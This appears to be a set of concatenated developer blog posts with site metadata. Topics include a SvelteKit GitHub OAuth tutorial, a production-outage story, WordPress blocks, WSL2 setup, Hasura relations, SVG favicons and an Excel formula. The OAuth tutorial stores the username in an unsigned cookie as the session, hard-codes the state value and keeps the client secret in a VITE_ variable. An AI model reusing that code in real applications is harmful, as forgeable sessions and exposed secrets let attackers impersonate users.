status?: number;
headers?: Headers;
body?: string | Uint8Array | JSONValue;
};
type RequestHandler<Locals = Record<string, any>> = (
request: Request<Locals>
) => void | EndpointOutput | Promise<EndpointOutput>;
```
So what do we want to accomplish here?
We want to redirect the request to the Github authentication endpoint with our CLIENT\_ID.
In order to respond from the server to the client with a redirect directive, we need to return a 3xx status code (let's use 302) and provide a location in the header. This location should be the Github OAuth authorization endpoint: [https://github.com/login/oauth/authorize](https://github.com/login/oauth/authorize)
src/routes/login.js
```
const ghAuthURL = 'https://github.com/login/oauth/authorize'
const clientId = import.meta.env.VITE_CLIENT_ID
export async function get(req) {
const sessionId = '1234'
return {
status: 302,
headers: {
location: `${ghAuthURL}?client_id=${clientId}&state=${sessionId}`
}
}
}
```
#### Handling the callback
Whether Github authorizes the user or not, Github needs a way to let our application know. This is why we gave Github the callback url. This url is the endpoint we need to create next. Create a new file src/routes/callback.js and in that file provide a get handler.
src/routes/callback.js
```
export async function get(req) {
return {
body: 'callback'
}
}
```
When we redirect the user to Github, Github will ask them to login, then authorize our application. If the user chooses to authorize the application, Github will redirect the browser to our callback endpoint passing with it a code query parameter. We want to use that code query parameter to get an access\_token for the authorized user. Then we will use the access\_token to get the user information from Github.
We can use the query.get method on the request object to read the code value. We can use the fetch function from the node-fetch library to make our requests.
```
yarn add node-fetch
```
#### Get access token
src/routes/callback.js
```
import fetch from 'node-fetch'
const tokenURL = 'https://github.com/login/oauth/access_token'
const clientId = import.meta.env.VITE_CLIENT_ID
const secret = import.meta.env.VITE_CLIENT_SECRET
export async function get(req) {
const code = req.query.get('code')
const accessToken = await getAccessToken(code)
return {
body: JSON.stringify(accessToken)
}
}
function getAccessToken(code) {
return fetch(tokenURL, {
method: 'POST',
headers: { 'Content-Type': 'application/json', Accept: 'application/json' },
body: JSON.stringify({
client_id: clientId,
client_secret: secret,
code
})
}).then(r => r.json())
.then(r => r.access_token)
}
```
#### Get user info
```
const userURL = 'https://api.github.com/user'
function getUser(accessToken) {
return fetch(userURL, {
headers: {
Accept: 'application/json',
Authorization: `Bearer ${accessToken}`
}
})
.then(r => r.json())
}
```
#### modify get function
```
export async function get(req) {
const code = req.query.get('code')
const accessToken = await getAccessToken(code)
const user = await getUser(accessToken)
return {
body: JSON.stringify(user)
}
}
```
In our callback handler we should now be seeing the user object! Great job! You have the happy path of GitHub OAuth working in SvelteKit. But we are not done.
#### Setting a cookie for user session
We need to instruct SvelteKit to write an HTTP-only cookie. This cookie will hold our user session.
#### hooks
We need to create a src/hooks.js file. This file will contain a handle function that lets us read and write cookies, since it wraps every incoming request.
```
import cookie from 'cookie'
export async function handle({request, resolve}) {
const cookies = cookie.parse(request.headers.cookie || '')
// code here happens before the endpoint or page is called
const response = await resolve(request)
// code here happens after the endpoint or page is called
return response
}
```
After the resolve function we want to check and see if the request’s locals object was modified with a user key. If it was, we want to set the cookie with the value.
```
import cookie from 'cookie'
export async function handle({ request, resolve }) {
const cookies = cookie.parse(request.headers.cookie || '')
// code here happens before the endpoint or page is called
const response = await resolve(request)
// code here happens after the endpoint or page is called
response.headers['set-cookie'] = `user=${request.locals.user || ''}; Path=/; HttpOnly`
return response
}
```
Setting the cookie with HttpOnly ensures that it cannot be read by client-side JavaScript; only the server sees it. The cookie will be stored in the browser and remain there until we clear it. So if we want to access the cookie information in any of our page or endpoint handlers, we need to parse the cookie and set the value on the request.locals object.
```
import cookie from 'cookie'
export async function handle({ request, resolve }) {
const cookies = cookie.parse(request.headers.cookie || '')
// code here happens before the endpoint or page is called
request.locals.user = cookies.user
console.log({ user: request.locals.user })
const response = await resolve(request)
// code here happens after the endpoint or page is called
response.headers['set-cookie'] = `user=${request.locals.user || ''}; Path=/; HttpOnly`
return response
}
```
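If you're curious what `cookie.parse` gives you, it essentially splits the Cookie header into key/value pairs. Here's a rough sketch of the idea (an illustration only; use the real `cookie` library, which also handles encoding and edge cases):

```javascript
// Rough sketch of what cookie.parse does with a Cookie header string.
function parseCookies(header) {
  const result = {};
  for (const pair of header.split(';')) {
    const index = pair.indexOf('=');
    if (index === -1) continue; // skip malformed fragments
    const name = pair.slice(0, index).trim();
    const value = pair.slice(index + 1).trim();
    result[name] = decodeURIComponent(value);
  }
  return result;
}

console.log(parseCookies('user=octocat; theme=dark'));
// { user: 'octocat', theme: 'dark' }
```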
#### set the request.locals.user value in callback.js
In src/routes/callback.js we need to set the request.locals.user value to the user.login identifier, which is guaranteed to be unique and works nicely for this demo.
```
export async function get(req) {
const code = req.query.get('code')
const accessToken = await getAccessToken(code)
const user = await getUser(accessToken)
// this mutates the locals object on the request
// and will be read by the hooks/handle function
// after the resolve
req.locals.user = user.login
return {
status: 302,
headers: {
location: '/'
}
}
}
```
#### Send session information to SvelteKit Load
In the src/hooks.js file we can set up another function called getSession. This function allows us to provide a session object that is received by every load function in a SvelteKit page component.
```
export async function getSession(request) {
return {
user: request.locals.user
}
}
```
#### Get session in the script module tag
In our src/routes/index.svelte page component we are going to add two script tags: the first, with context="module", will run on the server; the second will contain the client-side logic for our Svelte component.
```
<script context="module">
export async function load({ session }) {
return {
props: {
user: session.user,
},
};
}
</script>
<script>
export let user
</script>
<h1>Welcome to SvelteKit</h1>
<p>
Visit <a href="https://kit.svelte.dev">kit.svelte.dev</a> to read the documentation
</p>
{#if user}
<h2>Welcome {user}</h2>
<a href="/logout">
<button>Logout</button>
</a>
{:else}
<a href="/login">
<button>Login using Github</button>
</a>
{/if}
```
We use both script tags to pass the session value from the load function to the client script. This allows us to modify the view based on whether the user is present in the session, and to show the user's login name on the screen.

Sweet! ⚡️
#### Logout
Create a new file called src/routes/logout.js. In this file we will create a get endpoint handler. In this function, we set the user to null and redirect the request back to the home page.
```
export async function get(req) {
req.locals.user = null
console.log(req.locals.user)
return {
status: 302,
headers: {
location: '/'
}
}
}
```
Now, when you click the logout button, the cookie's user value is set to an empty string instead of the user.login.
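One note: writing `user=''` leaves an empty cookie in the browser. If you want the browser to actually delete it, you can add a `Max-Age=0` attribute when the value is empty. A sketch of a helper for building that Set-Cookie value (the helper name is mine, not part of the tutorial's code):

```javascript
// Hypothetical helper: build a Set-Cookie header value for the user session.
// When the value is empty we add Max-Age=0 so the browser deletes the cookie
// instead of keeping an empty one around.
function userCookie(value) {
  const base = `user=${value || ''}; Path=/; HttpOnly`;
  return value ? base : `${base}; Max-Age=0`;
}

console.log(userCookie('octocat')); // user=octocat; Path=/; HttpOnly
console.log(userCookie(null));      // user=; Path=/; HttpOnly; Max-Age=0
```

In the hooks handle function you would then write `response.headers['set-cookie'] = userCookie(request.locals.user)`.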
#### Protecting pages and endpoints
Now that you have authentication working with GitHub OAuth, you may want to protect some pages and endpoints. You can perform a check on each page you want to protect, or you can use the \_\_layout.svelte component with a list of path patterns you would like to protect.
src/routes/\_\_layout.svelte
```
<script context="module">
export async function load({page, session}) {
if (/^\/admin\/(.*)/.test(page.path) && session.user === '') {
return { redirect: '/', status: 302 }
}
return { props: {} }
}
</script>
<slot />
```
In this example, we are protecting all pages that start with /admin/\* in their path.
#### Summary
That is the end of this little journey, my friend. It was a nice trip; hopefully you laughed more than cried and learned something about SvelteKit. The SvelteKit routing bits are straightforward once you walk through how they work (not much magic), and by setting HTTP-only cookies you can create simple long-lived sessions for your applications. Remember, the information stored in the cookie is not encrypted, so do not store any secrets; use a cache or a database if you need to keep more session- or user-specific data.
> Demo Repository: [https://github.com/hyper63/tutorial-sveltekit-authentication](https://github.com/hyper63/tutorial-sveltekit-authentication)
#### Sponsored by hyper
If you are building an application and want your application to be:
- Easy to Maintain!
- Easy to Test!
- Without unintentional Technical Debt
You should check out hyper! [https://hyper.io](https://hyper.io) | hyper |
740,314 | Breaking Production | Recently, an intern at HBO Max mistakenly sent a test email to thousands of users in production.... | 0 | 2021-06-26T19:36:01 | https://davidtruxall.com/breaking-production/ | career | ---
title: Breaking Production
published: true
date: 2021-06-24 15:00:03 UTC
tags: Career
canonical_url: https://davidtruxall.com/breaking-production/
---
Recently, an intern at HBO Max [mistakenly sent a test email to thousands of users in production](https://www.newsweek.com/hbo-max-sparks-jokes-memes-integration-test-email-1601837). Twitter was on fire with memes and jokes, but I found the threads about developers’ experiences breaking production to be much more interesting. Most long-time developers have had the gut-wrenching experience of breaking production, and I’m no different. My story is more complicated than I could get in a Tweet, so I’m telling the story here.
The year was 2003. I was working at a company in the Detroit area migrating a classic ASP application to ASP.Net. The site “just had constant errors” that no one could elaborate on, and needed a thorough overhaul. The company decided to use the need to rewrite code as an opportunity to move to .Net since Microsoft was moving away from Classic ASP at that time. Unfortunately for me, there was no logging in the existing system, and all the exceptions were unhandled, so my team had no idea what was breaking or when it was happening. To try and get a grip on the problem, we wrote code to hook into the global error handler and have the server send everyone on the team an email with the error details so we could start to understand the problems and frequency by getting real-time alerts. There were no Sentry.io/Crashlytics/LogRocket services or the like at that time, so we built our own. We were testing this feature, and had not rolled it out to production yet. It was only in our development environment.
The day was August 14, 2003. That afternoon, there was a [severe blackout across the northeastern US](https://en.wikipedia.org/wiki/Northeast_blackout_of_2003). When it was clear the power was not coming back on, the company sent us home. For us the blackout lasted days. And this is where my failure begins.
The system I was working on was backed by an Oracle database, which had a dedicated administrator. The web servers had a different person administering them. During the blackout, the data center, which was located at our facility in Detroit, was running off of generators to keep services available to users outside the blackout area. The database administrator decided to shut down the development database server to conserve energy. But the web server admin kept the development web server running. Unbeknownst to me, the web server admin was running a tool that pinged the home page of the development web site every 8 seconds to make sure it was still alive. Unfortunately, the home page of the web site accessed the database, which was turned off. This caused an unhandled exception on the home page. We already know the site was not handling any exceptions. So the error fired the global exception handler and sent me and my team an email about the error. Every 8 seconds. For two days, because no one on my team was working during the blackout to see the emails.
We returned to the office when power was restored. No one in the company could get email though. That system was still down. Turns out it was down because of my code. The handler sent 56,000 emails during the blackout and filled the disk of the [Novell GroupWise](https://en.wikipedia.org/wiki/GroupWise) email server. Back in 2003 disks were nowhere near the size we use today. The email administrator was furious. No administrative tool existed for her to remove all those emails. My team had to sit for hours and hours and hours deleting emails using the desktop client, which was limited to selecting only 100 messages at a time. We certainly did our penance.
You might be thinking that the circumstances of the blackout caused the problem, not really a mistake in the code. But the fault was mine. I should have considered throttling in the error handler. It should have stopped sending the same error message repeatedly. There is no value seeing the same error over and over and over, especially over a short period of time. This was of course the first thing I fixed after deleting all the emails. It’s a hard-earned lesson I’ll never forget.
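In today's terms, the throttling fix might look something like this sketch (the function names, the one-hour window, and the sample error message are my illustration, not the original 2003 code):

```javascript
// Sketch of throttling an error notifier: remember when we last emailed each
// error signature and suppress repeats inside a time window.
function createErrorNotifier(sendEmail, windowMs = 60 * 60 * 1000, now = Date.now) {
  const lastSent = new Map();
  return function notify(errorMessage) {
    const last = lastSent.get(errorMessage);
    if (last !== undefined && now() - last < windowMs) {
      return false; // same error inside the window: swallow it
    }
    lastSent.set(errorMessage, now());
    sendEmail(errorMessage);
    return true;
  };
}

// Simulate the blackout: the same database error firing every 8 seconds.
let clock = 0;
const sent = [];
const notify = createErrorNotifier(msg => sent.push(msg), 60 * 60 * 1000, () => clock);
for (let i = 0; i < 1000; i++) {
  notify('ORA-12541: no listener');
  clock += 8000; // 8 seconds pass between pings
}
console.log(sent.length); // 3 emails instead of 1000
```

Same signal for the team, without filling anyone's mail server.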
I may have broken production at other times, but nothing as dramatic and difficult to recover from as this. If you are a junior person reading this, I can assure you that some day your code will break something. But you are not alone, it happens to all of us. I hope your breaks are minor and less consequential, but I know what you are feeling. Feel it and then take that lesson to heart and you’ll become a better developer. | davetrux |
740,414 | WordPress in 2021: new concepts | WordPress evolves. Let's see new features you might not know yet. The old new editor A... | 6,359 | 2021-06-26T23:02:00 | https://dev.to/spo0q/wordpress-in-2021-new-concepts-pfg | wordpress | WordPress evolves. Let's see new features you might not know yet.
## The _old new_ editor
A total revamp of the WordPress editor called "Gutenberg" has been released in 2018 with the 5.0 version. It has replaced the classic TinyMCE editor you may have seen for years in the WordPress admin.
Core developers wanted to revolutionize the entire WordPress publishing and editing experience:
> Gutenberg is a codename for a whole new paradigm in WordPress site building and publishing, that aims to revolutionize the entire publishing experience as much as Gutenberg did the printed word
[Source: WordPress documentation - the block editor](https://developer.wordpress.org/block-editor/).
It seems a large part of users (and developers) were not fully ready for that revolution, though.
Despite the considerable work of contributors who released the new editor as an experimental plugin approximately one year before, the community is still deeply divided about it.
Plugin developers have been creating solutions to circumvent the problem and even disable the entire feature. For example, the [classic editor plugin](https://wordpress.org/plugins/classic-editor/) has more than 5 million active installations in June 2021!
That's massive, and only fools would ignore this fact. While fear of change might be a _tiny, tiny_ part of the explanation, the multiple technical and compatibility issues did not help, not to mention the _deep impact_ on related ecosystems, page builders especially.
Anyway, that does not mean you cannot test blocks independently and maybe create great editing experiences for users. In that perspective, there are new concepts you might not know yet.
## What are Gutenberg blocks?
The idea with blocks is to provide pre-defined and pre-styled sections with advanced settings (or not) to make the page creation more fluid and smoother.
Users can now search, install and test third-party WordPress blocks right from the block editor.
It's called [the block directory](https://wordpress.org/plugins/browse/block/). Technically speaking, these "blocks" are small WordPress plugins that only register Gutenberg blocks and associated assets.
Note that the block editor is not only meant for plugin developers. Theme developers can also use it to create advanced styling and functionalities for their users.
The new editor has been developed mainly with JavaScript and React, which offers new perspectives, especially for non-WP/PHP experts.
If you want to dive into block creation, [read the documentation](https://developer.wordpress.org/block-editor/). In the next part, we'll see more advanced concepts.
## Reusable blocks
It's one of the best features, IMHO. You can save frequently used blocks for later use in other pages and posts.
It might make content publishing more efficient as users can create their custom library of reusable blocks within the block editor (e.g., email sign-ups, box author, social buttons, etc.).
Users can save advanced formatting and layout for later use.
It's exciting for developers (you can extend it programmatically), and it prevents repetitive work without added value for users.
You can add, edit and remove reusable blocks, but you can also export and import them (JSON format), so the work can be reused from one site to another. It's defined as a post type:
```
/wp-admin/edit.php?post_type=wp_block
```
The only thing that bothers me: there's no direct link in the admin menu! I think it's too bad for such a great feature. You have to edit a post and click on the options menu to get the link called "manage all reusable blocks":

I don't know why such a useful feature isn't surfaced more prominently.
## Block patterns
Theme developers can help users create engaging layouts with block patterns:

It's like a catalog of various pre-made blocks within the same parent container. There are built-in patterns and custom patterns.
[Source: documentation - block patterns](https://wordpress.org/support/article/block-pattern/)
Users can edit all blocks within a block pattern just like a regular block.
## Global styles and settings (upcoming)
The next release of WordPress (5.8) will introduce global styles and settings. The intent is to overcome some of the current limitations with blocks: granularity with user permissions, use contexts, theme's flavors, etc.
The current block editor supports styles only for individual blocks. There's no native way to go beyond the context of single pages and posts. With the new upcoming interface, you'll get a higher level of customization.
You can read [the great post by Riad Benguella](https://riad.blog/2021/05/05/introduction-to-wordpresss-global-styles-and-global-settings/) to get all details about this brand new concept.
## Towards Full Site Editing (FSE)
For now, blocks are only available when editing posts and pages, but the idea is to make the entire site customizable, including headers, sidebars, and footers.
It's a significant shift in the paradigm. Gutenberg's block model is to be extended to the entire site.
It is not without significance. The core teams want to unify the editing and publishing experience with a new content unit: the block, hence the need for global styles.
As far as I know, developers will have to add new files and directories to themes to enable FSE. For example, a `theme.json` file at the root of the theme folder will opt the theme in to the template editor feature.
Themes that do not include this file won't have it.
The template editor will allow for creating and editing block templates for specific posts and pages.
## Wrap up
WordPress continues to aim for the top with more and more granularity in the block editor. The upcoming 5.8 version looks promising, but I must admit I have mixed feelings about the full site editing.
These new functionalities and APIs are quite ingenious, but I'm not sure about the naming conventions. For example, generic terms such as "templates" might confuse both developers and users.
I also don't understand why pretty cool features such as reusable blocks are not featured in the admin menu.
This Full Site Editing mode seems to go beyond WordPress as a global vision for the next web, but I wonder if ecosystems are ready for it. | spo0q |
740,526 | Building WSL2 Environment for Web Development | This article will not cover all details about every bit. I just want to give what steps needs to be... | 0 | 2021-06-27T04:07:28 | https://dev.to/mefaba/building-wsl2-environment-for-web-development-3ggc | This article will not cover all details about every bit. I just want to give what steps needs to be done for building a wsl2 environment. Therefore I can also come back to this article and do things again.
1)Install WSL2 (Windows Subsystem for Linux) on your Windows machine.
google>> install wsl2
2)Install Ubuntu on top of WSL2 environment.
google>> install ubuntu wsl
3)Install node for ubuntu.
google>> install nodejs linux
4)Install git for ubuntu
google>>install git wsl
source: [https://docs.microsoft.com/en-us/windows/wsl/tutorials/wsl-git](https://docs.microsoft.com/en-us/windows/wsl/tutorials/wsl-git)
bash>>
```bash
git config --global user.name "Your Name"
git config --global user.email "youremail@email.com"
```
5)Install the VS Code WSL extension pack. We will use the Remote - WSL extension out of that bunch.
At this point, when you want to open a folder in WSL, you can type `Remote-WSL: Open Folder in WSL` in the VS Code command palette (Ctrl+Shift+P).
6)How to see folders and files inside WSL without using the command line. This is useful for reaching your project files easily, and it also allows us to open our projects in **GitHub Desktop.**
In a normal Windows Explorer window, go to the path `\\wsl$` > you will see an Ubuntu folder > right-click the Ubuntu folder icon > select Map network drive (Z:) > now Z: can be used like any other partition/drive.
Now Ubuntu is visible as a drive, so you can easily look up your files and also open folders in GitHub Desktop.
7)Now you can serve your website as you are used to. If, for example, you served your files with `npm start` successfully but there are no signs of life at localhost, try this: create a .wslconfig file at C:/Users/\<username>/.wslconfig
Inside .wslconfig, write following lines and save it:
[wsl2]
localhostForwarding=true
Then open a Windows command line and run: `wsl --shutdown`
Reload vscode window.
8)Since you can reach both WSL and Windows folders, it is possible to run a project stored in the Windows file system from WSL, but performance is very poor. You probably want to move your project folder into WSL. In Linux, store your projects under the path `home/<username>/`. You can also create a `home/<username>/webprojects/` folder.
source: [https://github.com/microsoft/WSL/issues/5298](https://github.com/microsoft/WSL/issues/5298) | mefaba | |
740,550 | Build Sports Team API with GraphQL - Hasura - Part 4 | This post is part of a series of post and so if you haven't read the previous one, please read that... | 13,301 | 2021-06-27T05:39:08 | https://www.eternaldev.com/blog/build-sport-team-api-with-graphql-hasura-part-4/ | graphql, postgres | This post is part of a series of post and so if you haven't read the previous one, please read that and come back and we will wait :)
## Objectives of this post
1. Introduction
2. What is many-to-many relationship
3. Creating the players table
4. How to create many-to-many relationship
5. Creating the table in Hasura for player recruitment
6. Adding foreign key to the player recruitment table
7. Adding array relationships in tables
8. Adding data to the recruitment table
9. Query the data
## Introduction
In the previous post, we learned how to create a one-to-many relationship with the teams table.
[BUILD SPORTS TEAM API WITH GRAPHQL - HASURA - PART 3](https://www.eternaldev.com/blog/build-sport-team-api-with-graphql-hasura-part-3/)
In this post, we will learn about creating a many-to-many relationship and how to add the much-awaited players to the team.
## What is many-to-many relationship
Consider the example of players playing a particular sport: each player can be part of many teams, whether their national team, a club team, a league team, and so on. And when you consider a team, there are many players who are part of it. So there is a many-to-many relationship between teams and players.
## Creating the players table
Column name: **id**, Type: Integer (auto-increment)
Column name: **created_at**, Type: Timestamp
Column name: **updated_at**, Type: Timestamp
Column name: **name**, Type: Text
Column name: **age**, Type: Integer
Column name: **jersey_number**, Type: Integer, Nullable: true (This field can be left empty)
Primary Key: id

## How to create many-to-many relationship
For a one-to-one or one-to-many relationship, we can just add a new column, set it as a foreign key, and create a new relationship in Hasura. But since we would need a list of player keys in the teams table, we cannot simply add a new column.
We need to create a new table which represents the relationship between players and teams. In doing so, each row in that new table will represent a player belonging to one team.
We can make use of this new table to add more info to the association between players and teams, such as the date of joining the team, the player's salary for that team, and so on.

## Creating the table in Hasura for player recruitment
Create a new table with the fields shown in the image below. You can add any relevant data you need when forming this many-to-many relationship.

## Adding foreign key to the player recruitment table
After creating the table, we need to specify that the two columns `player_id` and `team_id` are foreign keys pointing to their respective tables.


## Adding array relationships in tables
Now, we just need to add the array relationship on both the tables which will let us access the list of players from the teams query and access the list of teams from the players query.
Open the `Relationship` tab in the players table and then add the suggested array relationship and name the relationship as `teams`

Open the `Relationship` tab in the teams table and then add the suggested array relationship and name the relationship as `players`

After we add the array relationships, we will be able to access the id of the player from the teams query when we drill down. This is not very useful on its own, as we need the player info to display in the UI. So we add object relationships on the recruitment table (like a one-to-one relationship), which let us drill down further to the name of the player or the team they are part of.
Finally, add the two suggested object relationships in the `player_team_recruitments` table which we created before.

## Adding data to the recruitment table
We have all the relationships defined, so the next step is to populate the data in the table. We can just take the primary key of the player and the primary key of the team they belong to, and create a row with those details.

## Query the data
All the hard work till now has set up an API with proper relationships between the players and teams. Now we can reap the benefits by fetching that data in a single query.
```
query MyQuery {
teams {
team_name
players {
player {
name
age
}
}
}
}
OUTPUT:
{
"data": {
"teams": [
{
"team_name": "Australia Cricket Team",
"players": [
{
"player": {
"name": "Steve Smith",
"age": 31
}
}
]
},
{
"team_name": "Indian Cricket Team",
"players": [
{
"player": {
"name": "Virat Kolhi",
"age": 30
}
},
{
"player": {
"name": "Rohit Sharma",
"age": 28
}
},
{
"player": {
"name": "MS Dhoni",
"age": 34
}
},
{
"player": {
"name": "Bhuvaneshvar Kumar",
"age": 29
}
},
{
"player": {
"name": "Jasprit Bumrah",
"age": 26
}
}
]
},
{
"team_name": "England Cricket Team",
"players": [
{
"player": {
"name": "Joe Root",
"age": 30
}
}
]
}
]
}
}
```
Let's look at querying the list of players and their teams:
```
query MyQuery {
players {
name
teams {
team {
team_name
}
}
}
}
OUTPUT:
{
"data": {
"players": [
{
"name": "Virat Kolhi",
"teams": [
{
"team": {
"team_name": "Indian Cricket Team"
}
}
]
},
{
"name": "Rohit Sharma",
"teams": [
{
"team": {
"team_name": "Indian Cricket Team"
}
}
]
},
{
"name": "MS Dhoni",
"teams": [
{
"team": {
"team_name": "Indian Cricket Team"
}
}
]
},
{
"name": "Bhuvaneshvar Kumar",
"teams": [
{
"team": {
"team_name": "Indian Cricket Team"
}
}
]
},
{
"name": "Jasprit Bumrah",
"teams": [
{
"team": {
"team_name": "Indian Cricket Team"
}
}
]
},
{
"name": "Steve Smith",
"teams": [
{
"team": {
"team_name": "Australia Cricket Team"
}
}
]
},
{
"name": "Joe Root",
"teams": [
{
"team": {
"team_name": "England Cricket Team"
}
}
]
}
]
}
}
```
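You can run these queries from application code as well as from the Hasura console. Here is a sketch of calling the Hasura GraphQL endpoint with fetch; note that the endpoint URL and the admin-secret header below are placeholders for your own project's values, not real credentials:

```javascript
// Sketch of calling a Hasura GraphQL endpoint from JavaScript.
// HASURA_ENDPOINT and the admin-secret value are placeholders; never ship an
// admin secret to a browser - use permissions/JWT for client-side access.
const HASURA_ENDPOINT = 'https://your-project.hasura.app/v1/graphql';

const TEAMS_WITH_PLAYERS = `
  query TeamsWithPlayers {
    teams {
      team_name
      players { player { name age } }
    }
  }
`;

// Build the POST request options for a GraphQL query.
function buildRequest(query, variables = {}) {
  return {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'x-hasura-admin-secret': '<your-admin-secret>',
    },
    body: JSON.stringify({ query, variables }),
  };
}

// Usage (requires a real endpoint):
// fetch(HASURA_ENDPOINT, buildRequest(TEAMS_WITH_PLAYERS))
//   .then(r => r.json())
//   .then(({ data }) => console.log(data.teams));
```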
## Next Steps
This post concludes the series of posts on data modelling with examples.
Stay tuned by subscribing to our mailing list and joining our Discord community
[Discord](https://discord.gg/AUjrcK6eep) | eternal_dev |
751,714 | DZone Contributor of the Month award | The DZone tech publishing site selected me as their Editors’ Pick Contributor of the Month for June... | 0 | 2021-07-06T21:09:44 | https://phoenixtrap.com/2021/07/06/dzone-contributor-of-the-month-award/ | award, dzone, perl | ---
title: DZone Contributor of the Month award
published: true
date: 2021-07-06 18:00:43 UTC
tags: award,DZone,Perl
canonical_url: https://phoenixtrap.com/2021/07/06/dzone-contributor-of-the-month-award/
---
The [DZone](https://dzone.com/) tech publishing site selected me as their Editors’ Pick Contributor of the Month for June 2021! Here’s my (blessedly brief) acceptance speech during their monthly awards ceremony. (Fast-forward to [54:48](https://youtu.be/wt-unjqS1oA?t=3288).)
{% youtube wt-unjqS1oA %}
Unfortunately, they’ve just started to de-prioritize content syndicated from elsewhere due to Google not indexing it. Since every article has to go through a moderation and editing process, this means that I may not be able to fulfill my promise to post new Perl content there every week. You can still find it [here on phoenixtrap.com](https://phoenixtrap.com/tag/perl/), of course. ☺ | mjgardner |
752,132 | Creating Favicons for Light and Dark Mode UIs | Dark mode UIs are becoming increasingly popular. Often the legibility of a favicon is not great in... | 0 | 2021-07-07T06:29:24 | https://dev.to/wrux/creating-favicons-for-light-and-dark-mode-uis-3o74 | webdev, css | Dark mode UIs are becoming increasingly popular. Often the legibility of a favicon is not great in light or dark mode, so a dynamic solution is needed to display correctly in both modes.
Luckily, SVG favicons provide the functionality we need. If you are not using SVG favicons on your site yet, then go and change them now. You can drop those 20+ PNG icons in favour of a single SVG.
So here's the thing: we can use CSS in SVGs, meaning you can also use the [prefers-color-scheme](https://developer.mozilla.org/en-US/docs/Web/CSS/@media/prefers-color-scheme) media query to adjust the SVG.
Here's an example icon with some CSS to set the default path fill colour to black. The media query then changes the fill colour to white if the user has dark mode enabled.
```html
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 429.056 429.056">
<style>
path { fill: #000; }
@media (prefers-color-scheme: dark) {
path { fill: #fff; }
}
</style>
<path d="M413.696 182.272h-21.504v-68.096c-.512-8.192-7.168-14.848-15.36-15.36H229.888V4.608h-30.72v94.208H52.224c-8.192.512-14.848 7.168-15.36 15.36v68.096H15.36c-8.704 0-15.36 6.656-15.36 15.36v101.376c0 8.704 6.656 15.36 15.36 15.36h21.504v94.72c.512 8.192 7.168 14.848 15.36 15.36h324.608c8.192-.512 14.848-7.168 15.36-15.36v-94.72h21.504c8.704 0 15.36-6.656 15.36-15.36V197.632c0-8.704-6.656-15.36-15.36-15.36zm-313.344 36.352c0-24.576 19.968-44.544 44.544-44.544s44.544 19.968 44.544 44.544-19.968 44.544-44.544 44.544-44.544-19.968-44.544-44.544zm181.76 133.632H146.944v-30.72h135.168v30.72zm46.592-133.632c0 24.576-19.968 44.544-44.544 44.544-25.088 0-45.056-19.968-45.568-44.544 0-25.088 19.968-45.056 44.544-45.568 24.576-.512 45.056 19.968 45.568 44.544v1.024z" />
</svg>
```
You just need to link your new `icon.svg` file in the document head:
```html
<link rel="icon" href="/assets/icon.svg" />
```
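One caveat: not every browser supports SVG favicons (Safari notably lagged behind at the time of writing). A hedged fallback sketch in JavaScript is to swap a PNG icon when the color scheme changes; the PNG file names here are my assumptions, not files this article ships:

```javascript
// Fallback sketch for browsers without SVG favicon support.
// The PNG paths are placeholders - use whatever icons you export.
function iconForScheme(prefersDark) {
  return prefersDark ? '/assets/icon-dark.png' : '/assets/icon-light.png';
}

// Usage in the browser:
// const link = document.querySelector('link[rel="icon"]');
// const media = window.matchMedia('(prefers-color-scheme: dark)');
// const update = () => { link.href = iconForScheme(media.matches); };
// media.addEventListener('change', update);
// update();

console.log(iconForScheme(true)); // /assets/icon-dark.png
```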
Here's the outcome. You might need to reload the page when switching between light/dark mode UI.

 | wrux |
752,374 | Excel Formulas to Add Row Numbers and Skip Blanks ~ Simple Guide!! | In Excel, we can drag the fill handle to fill the sequence numbers in a column quickly and easily,... | 0 | 2021-07-12T03:22:26 | https://geekexcel.com/excel-formulas-to-add-row-numbers-and-skip-blanks-simple-guide/ | excelformula, excelformulas | ---
title: Excel Formulas to Add Row Numbers and Skip Blanks ~ Simple Guide!!
published: true
date: 2021-07-07 10:19:46 UTC
tags: ExcelFormula,Excelformulas
canonical_url: https://geekexcel.com/excel-formulas-to-add-row-numbers-and-skip-blanks-simple-guide/
---
In Excel, we can drag the fill handle to fill sequence numbers in a column quickly and easily, but sometimes we need to number rows based on adjacent cells. For example, if a cell contains a value, number it; if it is blank, leave the sequence blank as well. How can you solve this? Here we will show a simple trick to **add row numbers and skip the cells that are blank in Excel**. Let's see it below!! Get an official version of **MS Excel** from the following link: [https://www.microsoft.com/en-in/microsoft-365/excel](https://www.microsoft.com/en-in/microsoft-365/excel)
<figcaption id="caption-attachment-48660">Add row numbers and skip blanks</figcaption>
## Generic Formula:
- You can use the below formula to add sequential row numbers to a list of data and skip the cells that are blank in Excel.
**=[IF](https://geekexcel.com/use-if-function-in-microsoft-excel-365-simple-steps/)([ISBLANK](https://geekexcel.com/how-to-use-isblank-function-in-microsoft-excel-365/)(A1),"",[COUNTA](https://geekexcel.com/how-to-use-excel-counta-function-in-office-365-with-examples/)($A$1:A1))**
## Syntax Explanations:
- **IF** – In Excel, the [**IF function**](https://geekexcel.com/use-if-function-in-microsoft-excel-365-simple-steps/) helps to return one value for a TRUE result, and another for a FALSE result.
- **ISBLANK** – The [**ISBLANK function**](https://geekexcel.com/how-to-use-isblank-function-in-microsoft-excel-365/) returns TRUE when a cell is empty, and FALSE when it contains any text or value.
- **COUNTA** – This function counts the number of cells that are non-empty and returns the output in numbers. Read more on the **[COUNTA function](https://geekexcel.com/how-to-use-excel-counta-function-in-office-365-with-examples/)**.
- **A1** – It represents the input cell.
- **Comma symbol (,)** – It separates the arguments of a function.
- **Parentheses ()** – The main purpose of this symbol is to group the elements.
## Practical Example:
Let’s consider the below example image.
- First, we will enter the input values in **Column B.**
- Here we are going to add sequential row numbers to a list of data and skip the cells that are blank.
<figcaption id="caption-attachment-48662">Input Ranges</figcaption>
- Select any cell and type the above-given formula.
<figcaption id="caption-attachment-48661">Enter the formula</figcaption>
- Finally, press the **ENTER** key to get the result shown below.
<figcaption id="caption-attachment-48663">Result</figcaption>
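For readers who think in code, the same skip-blanks numbering logic can be sketched outside Excel. The following Python sketch is an illustration added here, not part of the original formula guide:

```python
def row_numbers_skip_blanks(values):
    """Mimic =IF(ISBLANK(A1),"",COUNTA($A$1:A1)) filled down a column:
    number only the non-blank cells, leaving blanks unnumbered."""
    result = []
    count = 0  # the running COUNTA($A$1:A1) as the range expands downward
    for value in values:
        if value is None or value == "":  # the ISBLANK check
            result.append("")             # leave the sequence blank
        else:
            count += 1                    # COUNTA grows only on non-blank cells
            result.append(count)
    return result

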